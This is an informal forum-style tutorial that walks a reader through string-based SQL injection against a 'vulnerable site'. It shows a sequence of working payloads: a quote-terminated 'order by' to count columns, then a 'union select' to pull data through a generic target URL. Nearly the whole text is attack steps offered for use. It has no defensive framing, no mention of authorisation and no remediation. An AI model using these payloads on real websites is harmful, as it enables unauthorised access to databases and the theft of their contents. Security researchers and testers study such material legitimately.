'ORDER BY' Doesn't work? Look here [String Based Tutorial]

Note: take a look at the updated version of this tutorial, which can be found here.



So you have find a vulnerable site but when you do 'order by 100--' it doesn't work?

This is probably due to the fact that you will have to use String Based Injection. I am going to show you how to do that :)

First lets say you have this website which gave you SQL Error.

Code:
www.target.com/injectpoint.php?ID=adm'

You try the regular command:

Code:
www.target.com/injectpoint.php?ID=adm+order+by+1--

Now you get no error and you now try this command:

Code:
www.target.com/injectpoint.php?ID=adm+order+by+100--

Hm.. Still no Error. Now it's time to use String Based Injection.

You try this new command:

Code:
www.target.com/injectpoint.php?ID=adm'+order+by+1--+-

Now you will still have no error, and you then use this command:

Code:
www.target.com/injectpoint.php?ID=adm'+order+by+100--+-

ERROR ! Finaly, so now it's just like regular injection, lets say we try:

Code:
www.target.com/injectpoint.php?ID=adm'+order+by+10--+-

Which gives us a error and then we try:

Code:
www.target.com/injectpoint.php?ID=adm'+order+by+9--+-

And that query gives us no Error. Then you just do it like normal injection:

Code:
www.target.com/injectpoint.php?ID=-adm'+union+select+1,2,3,4,5,6,7,8,9--+-

Now we have just performed a String Based SQL Injection. :)

NOTE: I wrote this tutorial very quick so there is a possibility their is typos and stuff like that, feel free to point them out for me. :)

-
Cowards die many times before their deaths